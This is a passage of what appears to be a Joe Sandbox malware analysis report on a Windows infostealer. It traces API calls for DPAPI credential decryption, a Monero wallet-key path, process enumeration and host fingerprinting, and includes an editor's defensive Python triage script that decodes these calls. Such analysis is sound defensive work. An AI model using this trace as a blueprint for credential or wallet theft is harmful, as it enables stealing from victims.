                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 658874ada4ceb4fcff2dbee3233e302b97217b748e0f85f482b2a8eb38a508db
                                  • Instruction ID: 5030dfb2a0393069e26de755285f0a97a32dd6c1889ccb93ea82ca927b6cbb19
                                  • Opcode Fuzzy Hash: 658874ada4ceb4fcff2dbee3233e302b97217b748e0f85f482b2a8eb38a508db
                                  • Instruction Fuzzy Hash: E6913872910214EBCB14FB74FC5A9ED737DAF88300F408668F94696181EE3C9B59CB96
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,007305AF), ref: 00727BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00727BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00727C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00727C62
                                  • LocalFree.KERNEL32(00000000), ref: 00727D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 3f124f26fe645cbe9c44fcf2ce844549499dd538869c2c8b54148e390171be43
                                  • Instruction ID: 1439d9913bba8483f55aa27c63a5f4132ab8478a44d44561e613c15f70c580ee
                                  • Opcode Fuzzy Hash: 3f124f26fe645cbe9c44fcf2ce844549499dd538869c2c8b54148e390171be43
                                  • Instruction Fuzzy Hash: 74413E71950228EBDB24DB54EC99BEDB7B8FF48700F204199E10962291DB782F85CFA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &O$)ks$/dgO$|;L$2ko$DK@$n_\
                                  • API String ID: 0-2266199521
                                  • Opcode ID: af4ca4038b02d00a615fea422290ea5efc420f3ad439ae00756c166367cfec7e
                                  • Instruction ID: a5a55118842b41423d744cb54d2f47aef736aa21d9db45e0abcc8a8d8e5c658a
                                  • Opcode Fuzzy Hash: af4ca4038b02d00a615fea422290ea5efc420f3ad439ae00756c166367cfec7e
                                  • Instruction Fuzzy Hash: 88B2F3B3A0C6049FE3046E2DEC8567AFBE9EF94720F1A493DE6C4C7344EA3558418796
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *W$I9|W$c?{$rz$yOwv$7c$X'
                                  • API String ID: 0-3388089906
                                  • Opcode ID: f294693cff21f9436f2f029f66ed1ec4e02ad0b78b67f84aaa79b36cb804c943
                                  • Instruction ID: 86db4bebb840908006de2b800b607409c86b756e7a4f8c29a02cfbc5ce4c1eee
                                  • Opcode Fuzzy Hash: f294693cff21f9436f2f029f66ed1ec4e02ad0b78b67f84aaa79b36cb804c943
                                  • Instruction Fuzzy Hash: DBB2E3F3A0C2009FE304AE2DEC8566ABBE5EF94720F1A493DEAC5C7744E63558418797
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00730D73), ref: 0071E4A2
                                  • StrCmpCA.SHLWAPI(?,007314F8), ref: 0071E4F2
                                  • StrCmpCA.SHLWAPI(?,007314FC), ref: 0071E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0071EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 7566d80b3fd4a6dadd6720d53b9d069d00e5d6a3cc9650671a7216fe362e5d5d
                                  • Instruction ID: c47c4720c1ea3f80a77cf60d3d34f1e7cc511c4d2a2df5f1663f73a1c95b2dc8
                                  • Opcode Fuzzy Hash: 7566d80b3fd4a6dadd6720d53b9d069d00e5d6a3cc9650671a7216fe362e5d5d
                                  • Instruction Fuzzy Hash: E6123571910128EBDB15FB60EC9AEED7379AF54300F4045A8F50A56192EF386F89CF92
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00714EEE,00000000,?), ref: 00719B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00714EEE,00000000,?), ref: 00719B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: Nq
                                  • API String ID: 4291131564-2915678141
                                  • Opcode ID: 4ea64eedc14a1fa5d4ef0d50b7d16d68a384227e1cdcd61aedd58e42e0d10371
                                  • Instruction ID: a5c85430a2415cd4feb552aead106198700b7a20911e6bd2cf357e81e59ffacc
                                  • Opcode Fuzzy Hash: 4ea64eedc14a1fa5d4ef0d50b7d16d68a384227e1cdcd61aedd58e42e0d10371
                                  • Instruction Fuzzy Hash: C011DFB4240308AFEB10CF64CCA5FAA77B5FB89701F208148FA159B3D0C7B6A941DB94
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0071C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0071C87C
                                  • lstrcat.KERNEL32(?,00730B46), ref: 0071C943
                                  • lstrcat.KERNEL32(?,00730B47), ref: 0071C957
                                  • lstrcat.KERNEL32(?,00730B4E), ref: 0071C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 50cdfd15a62d7ac37d102102bfc80b7215b59e80f4f6c816c443a76124a43de0
                                  • Instruction ID: c7d32622192994e94c79a8edbd0d0091b1d4b04e8aae1b6aaca8c62fc5d03473
                                  • Opcode Fuzzy Hash: 50cdfd15a62d7ac37d102102bfc80b7215b59e80f4f6c816c443a76124a43de0
                                  • Instruction Fuzzy Hash: DF417FB4D1431ADFDB10CF94DD89BFEB7B8BB48304F1042A8E509A6280D7746A84DF95
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 0072696C
                                  • sscanf.NTDLL ref: 00726999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007269B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007269C0
                                  • ExitProcess.KERNEL32 ref: 007269DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 6832049a7639f6f87624687a1742d1281cecf26f5af22c25eafdf022b05b4177
                                  • Instruction ID: a3301526b5b9288135afe96bdf3b7c8cd21970e18e9683ce4ae361bde09e353e
                                  • Opcode Fuzzy Hash: 6832049a7639f6f87624687a1742d1281cecf26f5af22c25eafdf022b05b4177
                                  • Instruction Fuzzy Hash: AA21EE75D14218ABCF04EFE4E9499EEB7B5FF48301F04852EE506E3250EB345605DB69
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0071724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00717281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007172A4
                                  • LocalFree.KERNEL32(?), ref: 007172AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 5b35426151731360e09e190e7beb4ae420b2492b904b8ae026ad7c86ca759bec
                                  • Instruction ID: a98b2f718f4c58b3734129c1fbc514210eceedffce4caf4d17a5a76e7c032e39
                                  • Opcode Fuzzy Hash: 5b35426151731360e09e190e7beb4ae420b2492b904b8ae026ad7c86ca759bec
                                  • Instruction Fuzzy Hash: 87014071A54308BBEB14DBD8CD45F9D77B8BB48701F104154FB05AB2C0D674AA019BA9
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0072961E
                                  • Process32First.KERNEL32(00730ACA,00000128), ref: 00729632
                                  • Process32Next.KERNEL32(00730ACA,00000128), ref: 00729647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0072965C
                                  • CloseHandle.KERNEL32(00730ACA), ref: 0072967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 84682c9b33f07563dc59323a489a3ee43d5c8127ec86d4da32d1b226e4e3eb53
                                  • Instruction ID: 7c12b535d15feffdeabbad8ac22859e2bc063037f48a6ee09ec88d952d0652ce
                                  • Opcode Fuzzy Hash: 84682c9b33f07563dc59323a489a3ee43d5c8127ec86d4da32d1b226e4e3eb53
                                  • Instruction Fuzzy Hash: A3014C75A10318EBCB10DFA5DC48BEDBBF8FB08301F044288AA0996240D7349B40DF55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: %a]?$%a]?$'W/$K-n
                                  • API String ID: 0-49836314
                                  • Opcode ID: a1c436e8d15c16e01856abe61a8b63dcb0d755a2f0ad7e5caf8811303631440e
                                  • Instruction ID: 0658c3b3a03d6f5c51d8e9a90104794285fb0ec28b04b48939983715bb062088
                                  • Opcode Fuzzy Hash: a1c436e8d15c16e01856abe61a8b63dcb0d755a2f0ad7e5caf8811303631440e
                                  • Instruction Fuzzy Hash: 58B219F360C2049FE3046E2DEC8567AFBE9EFD4720F1A453DE6C487744EA3558058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: 8kq$q9;w$q9;w$'O?
                                  • API String ID: 0-703812808
                                  • Opcode ID: 2577eeef80bc6eb48b966c1536f49d1f8cca7e47bce5275166192b29ae9d40df
                                  • Instruction ID: e6ba14903a8932250a00454e3a1a1e299cf4ccf1bbffe19fb1a31dd11d8d7fdc
                                  • Opcode Fuzzy Hash: 2577eeef80bc6eb48b966c1536f49d1f8cca7e47bce5275166192b29ae9d40df
                                  • Instruction Fuzzy Hash: E9B2E6F3A0C2009FE304AE29EC8567AFBE9EF94720F16893DE6C5C7744E63558058697
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00715184,40000001,00000000,00000000,?,00715184), ref: 00728EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 00216c6f8a5b45d057c3a07eac7c0d54c8195071e5faabd734f167a4f16e7424
                                  • Instruction ID: 2c64f90d63a724877295ff0a94108fa37f0c91a564ab5d4ec55c361f636c6321
                                  • Opcode Fuzzy Hash: 00216c6f8a5b45d057c3a07eac7c0d54c8195071e5faabd734f167a4f16e7424
                                  • Instruction Fuzzy Hash: F4110670205208BFDB40CF65EC84FAA37A9AF89301F109548F9198B250DB3AE941EB66
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0122EEF0,00000000,?,00730E10,00000000,?,00000000,00000000), ref: 00727A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00727A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0122EEF0,00000000,?,00730E10,00000000,?,00000000,00000000,?), ref: 00727A7D
                                  • wsprintfA.USER32 ref: 00727AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 7afe59ef376004a0eb1a3aefa9a5fb7de1446d2b59c4d53ae200a4c915c2bc3f
                                  • Instruction ID: 4392913b27f7e1771d02a347912263c4a32d91d04606a91b71574cdc732f2beb
                                  • Opcode Fuzzy Hash: 7afe59ef376004a0eb1a3aefa9a5fb7de1446d2b59c4d53ae200a4c915c2bc3f
                                  • Instruction Fuzzy Hash: 2911A5B1949228EBEB24CF55DD55F59B778F704721F104399E606932C0C7781E40CF55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: "p`+$_8=?$+{n
                                  • API String ID: 0-1499603292
                                  • Opcode ID: 1ea4b0d663f173d18901982b09ce911ba462157ddeafe775fb00ab7f7ae4d63e
                                  • Instruction ID: 017c0883eeddd193f8802c9c0180995549a383b42aaf604989e82c0e564f51aa
                                  • Opcode Fuzzy Hash: 1ea4b0d663f173d18901982b09ce911ba462157ddeafe775fb00ab7f7ae4d63e
                                  • Instruction Fuzzy Hash: 9DB2F8F360C204AFE304AE29EC8567AFBE9EF94720F16493DE6C5C3744E63598058697
                                  APIs
                                  • CoCreateInstance.COMBASE(0072E118,00000000,00000001,0072E108,00000000), ref: 00723758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007237B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: c3a16e7ea2cf8d277b10b3d9a32695581808f2e2fe86ddd373222c013e8b4fe8
                                  • Instruction ID: b96e58e607dc034638451ba925eb4b00276ee92261bfb6201f463ad3023d3d0b
                                  • Opcode Fuzzy Hash: c3a16e7ea2cf8d277b10b3d9a32695581808f2e2fe86ddd373222c013e8b4fe8
                                  • Instruction Fuzzy Hash: E1410971A00A2C9FDB24DB58DC98B9BB7B4BB48702F4041D8E608EB2D0E7756E85CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00719B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00719BA3
                                  • LocalFree.KERNEL32(?), ref: 00719BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 35874eb2c8707008a4a9e6f4f088b567e24074bab2498159da50c8c967064e20
                                  • Instruction ID: a8ca23242783083908b862b3ec4367ffd5ac77d74899d726b57a7764e0275971
                                  • Opcode Fuzzy Hash: 35874eb2c8707008a4a9e6f4f088b567e24074bab2498159da50c8c967064e20
                                  • Instruction Fuzzy Hash: 211109B8A00209EFDB04DF98D985AAEB7B5FF88300F104598E915A7390D774AE50CFA1
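The five API-resolved functions above (the Toolhelp32 process walk at ref 0072961E, CryptBinaryToStringA at 00728EC0, the time-zone query at 00727A63, CoCreateInstance at 00723758 and CryptUnprotectData at 00719B84) are listed by the sandbox as raw call lines with hex arguments. The Python below is an added triage helper written by the editor; it is not part of the Joe Sandbox report and not Joe Sandbox logic. It parses those lines, decodes the arguments that are well-known Win32 constants, and tags each function with a coarse capability from which APIs occur together. The API lines are copied verbatim from the report; the fn_<ref> labels, the constant tables and the co-occurrence rules are the editor's own assumptions.

```python
import re
from dataclasses import dataclass

# Constructed input: the 'APIs' lines of five functions, copied verbatim from this
# report.  The fn_<ref> labels are the editor's, taken from each block's first ref.
REPORT_BLOCKS = {
    "fn_0072961E": """
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0072961E
• Process32First.KERNEL32(00730ACA,00000128), ref: 00729632
• Process32Next.KERNEL32(00730ACA,00000128), ref: 00729647
• StrCmpCA.SHLWAPI(?,00000000), ref: 0072965C
• CloseHandle.KERNEL32(00730ACA), ref: 0072967A
""",
    "fn_00728EC0": """
• CryptBinaryToStringA.CRYPT32(00000000,00715184,40000001,00000000,00000000,?,00715184), ref: 00728EC0
""",
    "fn_00727A63": """
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0122EEF0,00000000,?,00730E10,00000000,?,00000000,00000000), ref: 00727A63
• RtlAllocateHeap.NTDLL(00000000), ref: 00727A6A
• GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0122EEF0,00000000,?,00730E10,00000000,?,00000000,00000000,?), ref: 00727A7D
• wsprintfA.USER32 ref: 00727AB7
""",
    "fn_00723758": """
• CoCreateInstance.COMBASE(0072E118,00000000,00000001,0072E108,00000000), ref: 00723758
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007237B0
""",
    "fn_00719B84": """
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00719B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00719BA3
• LocalFree.KERNEL32(?), ref: 00719BD3
""",
}

# One report line: "<api>.<module>(<args>), ref: <address>".  The argument list and
# the comma before "ref:" are optional (the wsprintfA line above has neither).
API_LINE = re.compile(
    r"^\s*•?\s*(?P<name>\w+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # int per argument; None where the sandbox printed '?' (unresolved)
    ref: int     # address of the call site


def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [None if a == "?" else int(a, 16) for a in raw.split(",")]
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


# Win32 constants the report leaves as raw hex (values from the Windows SDK headers).
CRYPT_STRING_FORMATS = {0x0: "CRYPT_STRING_BASE64HEADER", 0x1: "CRYPT_STRING_BASE64",
                        0x2: "CRYPT_STRING_BINARY", 0x4: "CRYPT_STRING_HEX", 0xC: "CRYPT_STRING_HEXRAW"}
CRYPT_STRING_MODIFIERS = {0x20000000: "CRYPT_STRING_STRICT", 0x40000000: "CRYPT_STRING_NOCRLF",
                          0x80000000: "CRYPT_STRING_NOCR"}


def decode_crypt_string_flags(flags):
    """Split CryptBinaryToString dwFlags into its output format plus line-ending modifiers."""
    fmt = flags & 0xFFFF
    names = [CRYPT_STRING_FORMATS.get(fmt, f"CRYPT_STRING_0x{fmt:x}")]
    names += [n for bit, n in CRYPT_STRING_MODIFIERS.items() if flags & bit]
    return names


def _pe32_size(v):
    # 0x128 == 296 == sizeof(PROCESSENTRY32) for the ANSI struct on 32-bit Windows; the
    # wide and 64-bit variants differ, so dwSize pins down the build flavour of the sample.
    return "sizeof(PROCESSENTRY32), ANSI/32-bit" if v == 0x128 else f"dwSize=0x{v:x}"


ARG_DECODERS = {
    ("CreateToolhelp32Snapshot", 0): lambda v: "TH32CS_SNAPPROCESS" if v == 0x2 else f"TH32CS_0x{v:x}",
    ("Process32First", 1): _pe32_size,
    ("Process32Next", 1): _pe32_size,
    ("CryptBinaryToStringA", 2): lambda v: "|".join(decode_crypt_string_flags(v)),
    ("LocalAlloc", 0): lambda v: "LPTR (LMEM_FIXED|LMEM_ZEROINIT)" if v == 0x40 else f"uFlags=0x{v:x}",
    ("CoCreateInstance", 2): lambda v: "CLSCTX_INPROC_SERVER" if v == 0x1 else f"CLSCTX=0x{v:x}",
    ("MultiByteToWideChar", 0): lambda v: "CP_ACP" if v == 0 else f"CodePage={v}",
}

# Co-occurrence rules (editor's heuristics): every API in the set must appear in the function.
CAPABILITY_RULES = [
    ({"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}, "enumerates running processes"),
    ({"Process32Next", "StrCmpCA"}, "compares process names against a fixed list (process search)"),
    ({"CryptUnprotectData"}, "decrypts DPAPI-protected blobs (typical for stored browser credentials)"),
    ({"CryptBinaryToStringA"}, "base64-encodes a buffer"),
    ({"GetTimeZoneInformation", "wsprintfA"}, "formats the host time zone into a string (host fingerprint)"),
    ({"CoCreateInstance"}, "instantiates a COM object"),
]


def decode_arguments(calls):
    decoded = {}
    for c in calls:
        for i, v in enumerate(c.args):
            dec = ARG_DECODERS.get((c.name, i))
            if dec is not None and v is not None:
                decoded[f"{c.name}[{i}]"] = dec(v)
    return decoded


def tag_capabilities(calls):
    present = {c.name for c in calls}
    return [tag for needed, tag in CAPABILITY_RULES if needed <= present]


def triage(blocks=REPORT_BLOCKS):
    """Return {label: {'calls': [...], 'args': {...}, 'tags': [...]}} for every block."""
    result = {}
    for label, text in blocks.items():
        calls = parse_api_lines(text)
        result[label] = {"calls": calls, "args": decode_arguments(calls), "tags": tag_capabilities(calls)}
    return result


if __name__ == "__main__":
    for label, info in triage().items():
        print(label, info["tags"], info["args"])
```

Two decoded values are worth a second look. dwSize 0x128 on Process32First/Next is the 32-bit ANSI PROCESSENTRY32, consistent with the 0x00710000 image base, and the StrCmpCA that follows each Process32Next is the case-sensitive compare of szExeFile that the report's "Searches for specific processes" and "Tries to detect process monitoring tools" signatures refer to. dwFlags 0x40000001 on CryptBinaryToStringA is CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, so the sample produces a single base64 line with no CR/LF, which is convenient for embedding in a request body.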
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: 5az$~=U
                                  • API String ID: 0-1614349201
                                  • Opcode ID: b159e509e1c76b249112d467839c1641ad2ce28f146bf57be94d4ecc129aa307
                                  • Instruction ID: f08d5834feeabb76b8627edb572757dc6eafdbf7f4fcab6a9fab7706e08cbdb3
                                  • Opcode Fuzzy Hash: b159e509e1c76b249112d467839c1641ad2ce28f146bf57be94d4ecc129aa307
